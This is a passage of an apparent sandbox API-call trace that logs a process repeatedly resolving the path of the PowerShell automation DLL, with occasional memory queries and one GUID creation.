lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25da98, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0044.614] GetLastError () returned 0x0 [0044.614] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25da48, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0044.614] GetLastError () returned 0x0 [0044.614] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25da48, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0044.614] GetLastError () returned 0x0 [0044.614] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25dc30, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0044.614] GetLastError () returned 0x0 [0044.614] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25dbe0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0044.614] GetLastError () returned 0x0 [0044.614] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25dbe0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0044.614] GetLastError () returned 0x0 [0044.614] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25d860, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0044.614] GetLastError () returned 0x0 [0044.614] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25d810, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0044.614] GetLastError () returned 0x0 [0044.614] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25d810, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0044.614] GetLastError () returned 0x0 [0044.614] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25dc30, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0044.614] GetLastError () returned 0x0 [0044.614] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25dbe0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0044.614] GetLastError () returned 0x0 [0044.614] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25dbe0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0044.614] GetLastError () returned 0x0 [0044.614] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25dc30, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0044.614] GetLastError () returned 0x0 [0044.614] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25dbe0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0044.614] GetLastError () returned 0x0 [0044.614] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25dbe0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0044.614] GetLastError () returned 0x0 [0044.615] VirtualQuery (in: lpAddress=0x25ccd4, lpBuffer=0x25dcd4, dwLength=0x1c | out: lpBuffer=0x25dcd4*(BaseAddress=0x25c000, AllocationBase=0x220000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0044.615] VirtualQuery (in: lpAddress=0x25cd10, lpBuffer=0x25dd10, dwLength=0x1c | out: lpBuffer=0x25dd10*(BaseAddress=0x25c000, AllocationBase=0x220000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0044.615] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25dc30, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0044.615] GetLastError () returned 0x0 [0044.616] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25dbe0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0044.616] GetLastError () returned 0x0 [0044.616] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25dbe0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0044.616] GetLastError () returned 0x0 [0044.616] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25db90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0044.616] GetLastError () returned 0x0 [0044.616] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25db40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0044.616] GetLastError () returned 0x0 [0044.616] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25db40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0044.616] GetLastError () returned 0x0 [0044.616] VirtualQuery (in: lpAddress=0x25d040, lpBuffer=0x25e040, dwLength=0x1c | out: lpBuffer=0x25e040*(BaseAddress=0x25d000, AllocationBase=0x220000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0044.616] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25db90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0044.616] GetLastError () returned 0x0 [0044.616] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25db40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0044.616] GetLastError () returned 0x0 [0044.616] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25db40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0044.616] GetLastError () returned 0x0 [0044.616] VirtualQuery (in: lpAddress=0x25d040, lpBuffer=0x25e040, dwLength=0x1c | out: lpBuffer=0x25e040*(BaseAddress=0x25d000, AllocationBase=0x220000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0044.616] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25db90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0044.616] GetLastError () returned 0x0 [0044.616] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25db40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0044.616] GetLastError () returned 0x0 [0044.616] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25db40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0044.616] GetLastError () returned 0x0 [0044.616] VirtualQuery (in: lpAddress=0x25d040, lpBuffer=0x25e040, dwLength=0x1c | out: lpBuffer=0x25e040*(BaseAddress=0x25d000, AllocationBase=0x220000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0044.616] VirtualQuery (in: lpAddress=0x25cfd8, lpBuffer=0x25dfd8, dwLength=0x1c | out: lpBuffer=0x25dfd8*(BaseAddress=0x25c000, AllocationBase=0x220000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0044.617] VirtualQuery (in: lpAddress=0x25d014, lpBuffer=0x25e014, dwLength=0x1c | out: lpBuffer=0x25e014*(BaseAddress=0x25d000, AllocationBase=0x220000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0044.617] VirtualQuery (in: lpAddress=0x25cfd8, lpBuffer=0x25dfd8, dwLength=0x1c | out: lpBuffer=0x25dfd8*(BaseAddress=0x25c000, AllocationBase=0x220000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0044.617] VirtualQuery (in: lpAddress=0x25d014, lpBuffer=0x25e014, dwLength=0x1c | out: lpBuffer=0x25e014*(BaseAddress=0x25d000, AllocationBase=0x220000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0044.617] VirtualQuery (in: lpAddress=0x25d014, lpBuffer=0x25e014, dwLength=0x1c | out: lpBuffer=0x25e014*(BaseAddress=0x25d000, AllocationBase=0x220000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0044.617] VirtualQuery (in: lpAddress=0x25cfd8, lpBuffer=0x25dfd8, dwLength=0x1c | out: lpBuffer=0x25dfd8*(BaseAddress=0x25c000, AllocationBase=0x220000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0044.617] VirtualQuery (in: lpAddress=0x25d014, lpBuffer=0x25e014, dwLength=0x1c | out: lpBuffer=0x25e014*(BaseAddress=0x25d000, AllocationBase=0x220000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0044.617] VirtualQuery (in: lpAddress=0x25cfd8, lpBuffer=0x25dfd8, dwLength=0x1c | out: lpBuffer=0x25dfd8*(BaseAddress=0x25c000, AllocationBase=0x220000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0044.617] VirtualQuery (in: lpAddress=0x25d014, lpBuffer=0x25e014, dwLength=0x1c | out: lpBuffer=0x25e014*(BaseAddress=0x25d000, AllocationBase=0x220000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0044.617] VirtualQuery (in: lpAddress=0x25cfd8, lpBuffer=0x25dfd8, dwLength=0x1c | out: lpBuffer=0x25dfd8*(BaseAddress=0x25c000, AllocationBase=0x220000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0044.618] VirtualQuery (in: lpAddress=0x25d014, lpBuffer=0x25e014, dwLength=0x1c | out: lpBuffer=0x25e014*(BaseAddress=0x25d000, AllocationBase=0x220000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0044.618] VirtualQuery (in: lpAddress=0x25ce7c, lpBuffer=0x25de7c, dwLength=0x1c | out: lpBuffer=0x25de7c*(BaseAddress=0x25c000, AllocationBase=0x220000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0044.618] VirtualQuery (in: lpAddress=0x25cfd8, lpBuffer=0x25dfd8, dwLength=0x1c | out: lpBuffer=0x25dfd8*(BaseAddress=0x25c000, AllocationBase=0x220000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0044.619] VirtualQuery (in: lpAddress=0x25d014, lpBuffer=0x25e014, dwLength=0x1c | out: lpBuffer=0x25e014*(BaseAddress=0x25d000, AllocationBase=0x220000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0044.619] VirtualQuery (in: lpAddress=0x25cfd8, lpBuffer=0x25dfd8, dwLength=0x1c | out: lpBuffer=0x25dfd8*(BaseAddress=0x25c000, AllocationBase=0x220000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0044.619] VirtualQuery (in: lpAddress=0x25d014, lpBuffer=0x25e014, dwLength=0x1c | out: lpBuffer=0x25e014*(BaseAddress=0x25d000, AllocationBase=0x220000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0044.619] CoCreateGuid (in: pguid=0x25e388 | out: pguid=0x25e388*(Data1=0x50536643, Data2=0x1046, Data3=0x45b4, Data4=([0]=0xa8, [1]=0x6e, [2]=0x60, [3]=0x46, [4]=0x6d, [5]=0x68, [6]=0x29, [7]=0xaf))) returned 0x0 [0044.619] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25da98, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0044.619] GetLastError () returned 0x0 [0044.619] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25da48, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0044.619] GetLastError () returned 0x0 [0044.619] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25da48, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0044.619] GetLastError () returned 0x0 [0044.619] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25da98, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0044.619] GetLastError () returned 0x0 [0044.619] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25da48, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0044.619] GetLastError () returned 0x0 [0044.619] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25da48, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0044.619] GetLastError () returned 0x0 [0044.619] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25dc30, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0044.619] GetLastError () returned 0x0 [0044.619] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25dbe0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0044.619] GetLastError () returned 0x0 [0044.619] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25dbe0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0044.619] GetLastError () returned 0x0 [0044.619] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25d860, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0044.619] GetLastError () returned 0x0 [0044.619] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25d810, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0044.619] GetLastError () returned 0x0 [0044.620] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25d810, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0044.620] GetLastError () returned 0x0 [0044.620] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25dc30, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0044.620] GetLastError () returned 0x0 [0044.620] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25dbe0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0044.620] GetLastError () returned 0x0 [0044.620] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25dbe0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0044.620] GetLastError () returned 0x0 [0044.620] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25dc30, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0044.620] GetLastError () returned 0x0 [0044.620] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25dbe0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0044.620] GetLastError () returned 0x0 [0044.620] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25dbe0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0044.620] GetLastError () returned 0x0 [0044.620] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25db90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0044.620] GetLastError () returned 0x0 [0044.620] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25db40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0044.620] GetLastError () returned 0x0 [0044.620] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25db40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0044.620] GetLastError () returned 0x0 [0044.620] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25daf0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0044.620] GetLastError () returned 0x0 [0044.620] GetFullPathNameW (in: 